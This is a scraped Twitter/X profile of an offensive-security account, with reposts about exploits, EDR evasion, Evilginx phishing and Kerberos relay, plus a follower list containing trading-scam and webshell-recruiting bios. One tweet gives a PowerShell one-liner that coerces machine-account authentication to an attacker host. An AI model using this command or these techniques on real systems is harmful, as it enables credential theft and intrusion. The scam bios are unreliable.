pwnspace @pwnspace
Offensive Security Engineer Earth planet Joined May 2023-
Tweets24
-
Followers41
-
Following764
-
Likes108
1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips gist.github.com/hackermondev/6…
Following up on my earlier tweet (x.com/decoder_it/sta…) regarding Kerberos relay with SMB server, I've uploaded my quick & dirty version. It's far from perfect, so feel free to improve it! github.com/decoder-it/Krb…
Following up on my earlier tweet (x.com/decoder_it/sta…) regarding Kerberos relay with SMB server, I've uploaded my quick & dirty version. It's far from perfect, so feel free to improve it! github.com/decoder-it/Krb…
Fun little IOC in impacket-smbserver's Negotiate Protocol Response 🙃
CVE-2024-34456: Trend Micro Antivirus One Dylib Injection syrion.me/CVE-2024-34456… #applesecurity #macossecurity #macosredteam
CtF hAs nOThInG tO dO wiTh AcTuAl SeCuRity ReSeArcH
@Chirag99Artani Nah Watchtowr did a real nice write up labs.watchtowr.com/palo-alto-putt…
Friendly reminder whether you’re designing malware or protecting against it, normal users don’t see computers the same way you do. I have to remind myself sometimes that a black box flickering momentarily, or a consent prompt from MOTW don’t raise the same alarms they do for us
If you, like many, think relying just on `cat` command's output is enough to be sure about the integrity of a bash file. Think twice, you could get hacked. Read below 👇
SOAPHound is out for walkies! SOAPHound is a #BloodHound collector to enumerate AD over SOAP instead of LDAP directly. Proud of Nikos for all his hard work! Blog: medium.com/falconforce/so… Tool repo: github.com/FalconForceTea… Detections: github.com/FalconForceTea…
Ok, pinvoke.dev is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
Our fellow BREAKDEV RED member @jackbutton_ has published the long awaited guide on how to protect your Evilginx instances ‼️ Find out how to deploy an additional Cloudflare layer in front, for extra protection! 🔥🎣 A must read for all phishermen! 🪝🐟 jackphilipbutton.com/post/how-to-pr…
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
It was well described by @Jackson_T - basically there are 4 distinct areas when it comes to EDR evasion: - blending in - sensor avoidance - abusing blind spots - tampering sensors (including traffic manipulation) Sensor avoidance is something a lot of peeps miss. More on this:…
It was well described by @Jackson_T - basically there are 4 distinct areas when it comes to EDR evasion: - blending in - sensor avoidance - abusing blind spots - tampering sensors (including traffic manipulation) Sensor avoidance is something a lot of peeps miss. More on this:…
Did a write-up about analyzing 'SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955' through a memory dump of the w3wp.exe process. I cover different debugging techniques that can be applied to other w3wp.exe dumps as well. github.com/DebugPrivilege…
My friend @waelmas01 just published his talk from BSides Cyprus 2023 where he gave one of the best live demos of a phishing attack using Evilginx, together with great explaination of all the steps how he perfected the attack. 🔥🪝🐟 Highly recommended! youtube.com/watch?v=p1opa2…
Calling all Red Teamers 🚨 Today we are introducing Tartarus-TpAllocInject, a new OPSEC-safe loader and technique for bypassing EDR solutions, by @trickster012 labs.nettitude.com/blog/creating-…
To celebrate @WyzeCam's decision to release a firmware update a day before this years Pwn2Own Toronto competition.. I've decided to release the exploit for my (killed) bugchain: github.com/blasty/unwyze .. maybe next time they will not withhold patches for critical bugs? 🙃
Easy alternative to running whoami: use an 0day to get SYSTEM
It’s very common for us to see offensive tooling enable SeDebugPrivilege so that they may bypass certain OS checks. However, what does this mean? Which OS checks are skipped? I dove into this and decided to write a blog on it. Check it out! bit.ly/3trYxdg
EV_BatteryBets🇺�... @Baulu3327500
41 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Serbor @Serbor831724
38 Followers 1K Following
FCF_Machine🇺🇸 @Gloijad45323
38 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Karen Chonabayashi @KChonabaya66001
5 Followers 169 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/C6hUQdXgMC
Judy @l_judy14
151 Followers 3K Following
Aric Bartell @BartellAri92912
7 Followers 282 Following Hello. I'm Joey. Hope you can follow me and become friends. https://t.co/hNjphMcvdI
Alibabas @0x_alibabas
73 Followers 338 Following
Patrick @RVA4n6
645 Followers 518 Following Richmond, VA #RVA Director of Digital Forensics, writer, trainer in #dfir & Active Attack Response, former LE. Motorcycler & traveler. Opinions = my own.
JosexD j0s3 tr0y4 @JosexDDD
211 Followers 702 Following Bible reader Isaac Newton biblical views supporter. My tweets are not my employer's views. Zero day VR+XDEV: https://t.co/9hoc97AaQR
Peter Winter-Smith @peterwintrsmith
6K Followers 3K Following Security researcher & implant developer @mdseclabs; developing SAST @wsastsupport; malware, code analysis, appsec, cryptography. Trying to follow Christ.
Hanna @fadilahhannah
3K Followers 6K Following 25+ Licensed-FINRA Broker | Security Exchange Commission | MAGA 🇺🇸 | Coach #SHX Advisor @ripple 𝕏 #SOL #XLM #HBAR | Ledger |💎 AXA ADV, LLC (CRD#:6627)
Sochosl @Sochosl_a9x0J
67 Followers 5K Following
Valeria @valeria23kramer
309 Followers 3K Following
RaeBlack @8m6g7OxOKm7UzlU
78 Followers 7K Following
BitMindz @bitmindz
318 Followers 461 Following Innovating the latest in technology to bring the best workstations available to support the forensic and DFIR community.
Securityblog @Securityblog
12K Followers 14K Following There are 10 types of people in the world. Those who understand binary, and those who don't. All opinions and views are my own. #BsidesDub organizer
Alina @southanish79377
53 Followers 3K Following Behind every successful woman is a team of other successful women.
Wael Masri @waelmas01
377 Followers 219 Following Multidisciplinary Tech Leader | NASA Space Apps Winner | Web Summit Finals | TEDx | BSides
Marco Gesilao @GesilaoMarco
2 Followers 48 Following
Barbara @totty_barbara69
299 Followers 3K Following
Colleen @carrier1colleen
317 Followers 3K Following
Eula @eula_crittendon
268 Followers 3K Following
dub @dub_4n6
682 Followers 5K Following mobile forensics 🕵️♀️📱#DFIR #digitalforensics⚖️#imsicatcher #countersurveillance #TSCM / “soundboy” 🎛🔊1.3.1.2. 🚩🏴 🔻
Stephanie @warren10stephan
331 Followers 3K Following
Crypto Win-Win @Perciva56175103
3 Followers 76 Following Share stocks and cryptocurrencies info 🎁Daily profit sharing plan. Please click the link👉https://t.co/prafiv9PgT
Karin @karin_branch_
313 Followers 3K Following
Marilyn @medranomarilyn4
345 Followers 3K Following
0x90 Hey Eugene! @_HeyEug_
812 Followers 6K Following Il trucco, William Potter, è di non preoccuparsi che fa male.
Mary @mary98long98
539 Followers 3K Following
Gertrude @gertrudemarine8
380 Followers 3K Following
Andria @andria1thames
284 Followers 3K Following
4NC13N7C0D3X @4NC13N7C0D3X
190 Followers 3K Following
Phemt @Matteopiciarell
166 Followers 140 Following
Antonio Cuomo @antonio_cuomo
462 Followers 1K Following CTF Player (arkantolo) - Cracking Enthusiast, System and Network Security Analyst @ https://t.co/XyYazZto6G
I Know First @i_Know_First
32K Followers 28K Following Daily forecast: stock forecast, indexes, commodities and currencies based on #AI predictive algorithm. Google us: ״I Know First stock forecast״
Dark Web Intelligence @DailyDarkWeb
138K Followers 0 Following Daily Dark Web dose from the dark side.
Alibabas @0x_alibabas
73 Followers 338 Following
Smukx.E @5mukx
14K Followers 230 Following Malware Researcher & Red Teamer | 0-Day 🔬 at 🌒 | 0x15 Y/o
@evaristegal0is@masto... @evaristegal0is
5K Followers 500 Following 🏳️🌈🦄 don't drink and root 🦄🏳️🌈 @Pitch Security. Formerly @smallpdf @arduino. 🐘 @[email protected]
sferrini @Simone_Ferrini
5K Followers 1K Following *OS Security Researcher & Director at @prdgmshift. Passionate about RE, fuzzing, hardware and low-level binary stuff. ʚଓ
Patrick @RVA4n6
645 Followers 518 Following Richmond, VA #RVA Director of Digital Forensics, writer, trainer in #dfir & Active Attack Response, former LE. Motorcycler & traveler. Opinions = my own.
H4T4WAY @H4t4Way
424 Followers 2K Following OSCP | eWPT | CNSS | WAS C4 Warden @code4rena Lover of WebSec | SRT @SynackRedTeam #hacking #bugbounty https://t.co/w5SOQffePr… https://t.co/OvJkCLMj4M
mdowd @mdowd
32K Followers 747 Following Internet Hacker. Founder of @vigilant_labs. Previously, co-founder of Azimuth Security (now L3Harris Trenchant)
Stefan Esser @i0n1c
115K Followers 464 Following CEO of @Antid0tecom (former CEO of @SektionEins) (contact: [email protected])
Gynvael Coldwind @gynvael
38K Followers 1K Following security researcher/programmer/director @ HexArcana Cybersecurity GmbH ⁂ @pagedout_zine ⁂ @DragonSectorCTF ⁂ https://t.co/ShG2c5As1K ⁂ ex-Google ⁂ he/him
Alex Plaskett @alexjplaskett
12K Followers 571 Following Security Researcher | Pwn2Own 2018, 2021, 2022, 2024 | Posts about 0day, OS, mobile and embedded security.
Zhuowei Zhang @zhuowei
33K Followers 187 Following link in bio ⬛⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩 ⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩🟩🟩 ⬛⬛🟧⬛🟩🟫🟫🟫🟫🟫🟫🟩 ⬛⬛🟧⬛🟫🟫🟫🟫🟫🟫🟫🟫 ⬛⬛🟧🟧🟫🟧🟩🟧🟧🟩🟧🟫🟧 ⬛⬛🟧🟧🟫🟧🟫🟧🟧🟫🟧🟫🟧 ⬛⬛⬛🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧 ⬛⬛⬛🟩🟩🟧🟧🟫🟫🟧🟧🟩🟩 ⬛🟫🟫🟫🟫🟫🟧🟧🟧🟧🟩🟩🟫 🟫🟫🟧🟫🟫🟫🟫🟩🟩🟩🟩🟩🟧 🟫🟧🟧🟧🟫🟫🟧🟫🟫🟩🟩🟧🟧
Halvar Flake @halvarflake
44K Followers 3K Following Choose disfavour where obedience does not bring honour. I do math. And was once asked by R. Morris Sr. : "For whom?" @[email protected]
George Hotz 🌑 @realGeorgeHotz
300K Followers 204 Following President @comma_ai. Founder @__tinygrad__
Filippo Roncari @f_roncari
2K Followers 590 Following Curious guy with a long-time passion for zero-days. CTO @prdgmshift, *OS security research. Prev: research director @■, co-founder and researcher @truel_it.
solst/ICE @IceSolst
21K Followers 2K Following Pentester turned seceng turned meeting canceller - https://t.co/5hHG2R5lRS (-13$ ARR)
Jack @rogermoore51
410 Followers 5K Following
Neelu Tripathy @NeeluTripathy
2K Followers 441 Following Senior Security Architect | Host, Breakpoint Security Podcast | #OSCP | Ex @null0x00 Mum,BLR Chapter Lead | Opinions are my own
Joshua J. Drake @jduck
28K Followers 2K Following Securing the future through modern technology. Founder and Software Security Specialist at @magnetitesec
n0ps @n0ps3
367 Followers 668 Following Staff Mobile Security Architect at ________ 📱🦄 Trail running ⛰️🏃
Catalin Cimpanu @campuscodi
107K Followers 2K Following Parked account. I don't usually post here on a regular basis. Cybersecurity reporter. Check me out on BlueSky and Mastodon.
JosexD j0s3 tr0y4 @JosexDDD
211 Followers 702 Following Bible reader Isaac Newton biblical views supporter. My tweets are not my employer's views. Zero day VR+XDEV: https://t.co/9hoc97AaQR
kingroryg @kingroryg
460 Followers 1K Following helping make AI secure @AWSCloud, prev: @CarnegieMellon
THE PATTERNIST HISTOR... @ThePatternist
2K Followers 5K Following Historic adult warrior colouring books as well as free astrology resources https://t.co/OcMF4aRzeb
Kha1ifuzz @kha1ifuzz
4K Followers 1K Following Someone adores Information Security! Founder of https://t.co/lQ6VWRar1P and https://t.co/Jfjek6yI0F https://t.co/zrCVcrn1MJ
Hussein Muhaisen @husseinmuhaisen
2K Followers 4K Following In stealth reversing security complexity for the consumer and the enterprise // @ // PagedOut and GuidedHacking
Mathew Solnik @msolnik
3K Followers 2K Following CEO @ OffCell Research / Head of Security Engineering @ WitnessAI
1ce0ear @1ce0ear
2K Followers 1K Following Offensive Pixel / Android Vulnerability Researcher @ Google (Tweets are my own).
James Leyte-Vidal @JamesLeyteVidal
729 Followers 2K Following SANS Principal Instructor. IT Security practitioner. GSE 209. Gamer and runner in my abundant spare time. Likely being sarcastic. FMaaS. He/Him
R. @0xrb
6K Followers 1K Following Reverse Threat Intel | Malware /Threat Hunter | Exploit Research \\ #IoT #Malware #Research, Reverse Engineering, #Botnet C2 #Hijacking
crep1x @crep1x
3K Followers 313 Following Lead cybercrime analyst, tracking adversaries activities & infrastructure, at @sekoia_io
Karan @0xDISREL
3K Followers 662 Following CTI Analyst & Malware Researcher | Staff at @vxunderground | PTC
d3d aka dead (dead, �... @deadvolvo
5K Followers 182 Following Senior Security Researcher @akamai - Malicious Group - SRT - DoD researcher of the year 2022 - Top 10 web attacks 2023 - CRTO - MSRC Top 75 in Q1/Q2 2025
Aurélien Chalot @Defte_
3K Followers 459 Following Hacker, sysadmin and security researcher @OrangeCyberdef 💻 Calisthenic enthousiast 💪 and wannabe philosopher https://t.co/SqDDhIGGGh 📖 🔥 Hide&Sec 🔥
Jenish Sojitra @_jensec
22K Followers 533 Following $2M in Bug Bounties. Creator of https://t.co/Sbnrie1LXH Security @Exodus
Paul Seekamp @nullenc0de
17K Followers 608 Following I spend a significant amount of time reading security stuff. Co-Founder/Partner @CoastlineCyber https://t.co/ZQT5L8q2RO
Savan Gadhiya @gadhiyasavan
779 Followers 2K Following Technical Director at @TheSecOpsGroup. Previously worked at @NotSoSecure and @Net_Square_Trends for United States
You might like
